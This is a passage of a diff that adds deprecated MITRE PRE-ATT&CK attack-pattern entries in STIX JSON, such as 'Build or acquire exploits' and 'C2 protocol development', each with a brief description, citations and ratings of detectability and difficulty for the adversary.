+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Physical security is often unaware of implications of physical access to network. However, some organizations have thorough physical security measures that would log and report attempted incursions, perimeter breaches, unusual RF at a site, etc.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social engineering and OSINT are still generally successful. Physical locations of offices/sites are easily determined. Monitoring for other sites of interest, such as backup storage vendors, is also easy to accomplish.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1079", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d69c3e06-8311-4093-8e3e-0a8e06b15d92", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess targeting options", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1296).\n\nAn adversary may assess a target's operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more of less cautious in different environments. 
(Citation: Scasny2015) (Citation: EverstineAirStrikes)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1296", + "external_id": "T1296" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "EverstineAirStrikes", + "description": "Brian Everstine. (2015, June 04). Carlisle: Air Force intel uses ISIS 'moron's' social media posts to target airstrikes. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender does not have access to information stored outside of defenders scope or visibility (e.g., log data for Facebook is not easily accessible). Defender has very infrequent visibility into an adversary's more detailed TTPs for developing people targets.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Information is out in the open for items that are available - part of this is ease of use for consumers to support the expected networking use case. OSINT can provide many avenues to gather intel which contain weaknesses. 
Developing and refining the methodology to exploit weak human targets has been done for years (e.g., spies).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1073", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--1def484d-2343-470d-8925-88f45b5f9615", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess vulnerability of 3rd party vendors", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).\n\nOnce a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1298", + "external_id": "T1298" + }, + { + "source_name": "Zetter2015Threats", + "description": "Kim Zetter. (2015, January 4). The Biggest Security Threats We\u2019ll Face in 2015. Retrieved March 5, 2017." + }, + { + "source_name": "WSJTargetBreach", + "description": "Paul Ziobro. (2014, February 6). Target Breach Began With Contractor's Electronic Billing Link. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd parties would most likely not report network scans to their partners. 
Target network would not know that their 3rd party partners were being used as a vector.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "The difficult part is enumerating all 3rd parties. Finding major partners would not be difficult. Significantly easier with insider knowledge. Vulnerability scanning the 3rd party networks is trivial.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1075", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assign KITs, KIQs, and/or intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).\n\nOnce generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1238", + "external_id": "T1238" + }, + { + "source_name": "AnalystsAndPolicymaking", + "description": "Jack Davis. (2002, September). Improving CIA Analytic Performance: Analysts and the Policymaking Process. Retrieved March 5, 2017." 
+ }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1015", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a86a21a4-6304-4df3-aa6d-08114c47d48f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assign KITs/KIQs into categories", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1228).\n\nLeadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. 
(Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1228", + "external_id": "T1228" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1005", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authentication attempt", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nAttempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1381", + "url": "https://attack.mitre.org/techniques/T1381" + }, + { + "description": "Gary Glover. 
(2015, June 25). Remote access threats are imminent. Retrieved March 31, 2017.", + "source_name": "Remote Access Healthcare" + }, + { + "description": "Brian Prince. (2014, July 31). Hackers Turn Remote Desktop Tools Into Gateways for Point-of-Sale Malware Attacks. Retrieved March 31, 2017.", + "source_name": "RDP Point of Sale" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:13:56.705Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1158", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials. This is increasingly difficult to obtain access when two-factor authentication mechanisms are employed.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is possible with diligent monitoring of login anomalies, expected user behavior/location. If the adversary uses legitimate credentials, it may go undetected.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authorized user performs requested cyber action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nClicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. 
(Citation: AnonHBGary)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1386", + "url": "https://attack.mitre.org/techniques/T1386" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:27.989Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1163", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Users unwittingly click on spearphishing links frequently, despite training designed to educate about the perils of spearphishing.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Some environments have anti-spearphishing mechanisms to detect or block the link before it reaches the user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--0e6abb17-0f81-4988-9fd2-4ba0b673d729", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Automated system performs requested action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUsers may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. 
(Citation: WSUSpect2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1384", + "url": "https://attack.mitre.org/techniques/T1384" + }, + { + "description": "Paul Stone & Alex Chapman. (2015, August 5). WSUSpect: Compromising the Windows Enterprise via Windows Update. Retrieved March 1, 2017.", + "source_name": "WSUSpect2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:15:05.089Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1161", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Autoruns with USB keys and CDs traditionally were always on (e.g., [http://windows.microsoft.com Windows] 7 is now an exception with a new policy of limiting the always on nature of Autoruns), ensuring and automated system completes a requested action. Specialized use cases exist where automated systems are specifically designed against automatically performing certain actions (e.g., USB/CD insertion and automatically running is disabled in certain environments).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Environments without extensive endpoint sensing capabilities do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build and configure delivery systems", + "description": "This object is deprecated as its content has been merged into the enterprise domain. 
Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).\n\nDelivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1347", + "external_id": "T1347" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is detectable once deployed to the public Internet, used for adversarial purposes, discovered, and reported to defenders.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is easy to create and burn infrastructure. Otherwise, blacklisting would be more successful for defenders.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1124", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build or acquire exploits", + "description": "This object is deprecated as its content has been merged into the enterprise domain. 
Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).\n\nAn exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1349", + "external_id": "T1349" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. 
Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1126", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build social network persona", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1341).\n\nFor attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites ([Facebook](https://www.facebook.com), [LinkedIn](https://www.linkedin.com), [Twitter](https://twitter.com), [Google+](https://plus.google.com), etc.). 
(Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1341", + "external_id": "T1341" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "source_name": "RobinSageInterview", + "description": "Joan Goodchild. (2010, July 8). The Robin Sage experiment: Fake profile fools security pros. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1118", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Performing activities like typical users, but with specific intent in mind.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "created": "2017-12-14T16:46:06.044Z", + "modified": "2020-10-26T13:42:49.342Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "type": "attack-pattern", + "x_mitre_old_attack_id": "PRE-T1105", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS TLDs and registrars. Adversary may choose domains that are similar to legitimate domains (aka \"domain typosquatting\" or homoglyphs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information.", + "x_mitre_detectable_by_common_defenses": "Yes", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1328", + "external_id": "T1328" + }, + { + "source_name": "PWCSofacy2014", + "description": "Tom Lancaster and Michael Yip. (2014, December 05). APT28: Sofacy? 
So-funny.. Retrieved March 6, 2017." + } + ], + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).\n\nDomain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)", + "name": "Buy domain name", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8e211ec9-5dfc-4915-aff4-84d5908f0336", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "C2 protocol development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1352).\n\nCommand and Control (C2 or C&C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1352", + "external_id": "T1352" + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "C2 over commonly used and permitted protocols provides the necessary cover and access.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1129", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7a265bf0-6acc-4f43-8b22-2e58b443e62e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Choose pre-compromised mobile app developer account credentials or signing keys", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1391).\n\nThe adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. 
(Citation: Fraudenlent Apps Stolen Dev Credentials)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1391", + "external_id": "T1391" + }, + { + "source_name": "Fraudenlent Apps Stolen Dev Credentials", + "description": "Galen Gruman. (2014, December 5). Keep out hijackers: Secure your app store dev account. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Possible to detect compromised credentials if alerting from a service provider is enabled and acted upon by the individual.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "The difficulty of obtaining useful developer credentials may vary. Well-organized, professional app developers whose credentials or signing keys would be the most useful to an adversary because of the large install bases of their apps, would likely strongly protect their credentials and signing keys. Less-organized app developers may not protect their credentials and signing keys as strongly, but the credentials and signing keys would also be less useful to an adversary. 
These less-organized app developers may reuse passwords across sites, fail to turn on multi-factor authentication features when available, or store signing keys in unprotected locations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1168", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9a8c47f6-ae69-4044-917d-4b1602af64d9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Choose pre-compromised persona and affiliated accounts", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1343).\n\nFor attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1343", + "external_id": "T1343" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "source_name": "Hacked Social Media Accounts", + "description": "Marcus Habert. (2015, November 8). What Happens to Hacked Social Media Accounts. Retrieved March 28, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1120", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is relatively easy and low cost to purchase compromised credentials. Mining social media sites offers open source information about a particular target. Most users tend to reuse passwords across sites and are not paranoid enough to check and see if spoofed sites from their persona exist across current social media.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Possible to detect compromised credentials if alerting from a service provider is enabled and acted upon by the individual.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0c592c79-29a7-4a94-81a4-c87eae3aead6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Common, high volume protocols and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).\n\nCertain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. 
(Citation: symantecNITRO)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1321", + "external_id": "T1321" + }, + { + "source_name": "symantecNITRO", + "description": "Eric Chien and Gavin O\u2019Gorman. (n.d.). The Nitro Attacks: Stealing Secrets from the Chemical Industry. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "High level of entropy in communications. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to decipher or to make the communication less conspicuous.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1098", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party infrastructure to support delivery", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
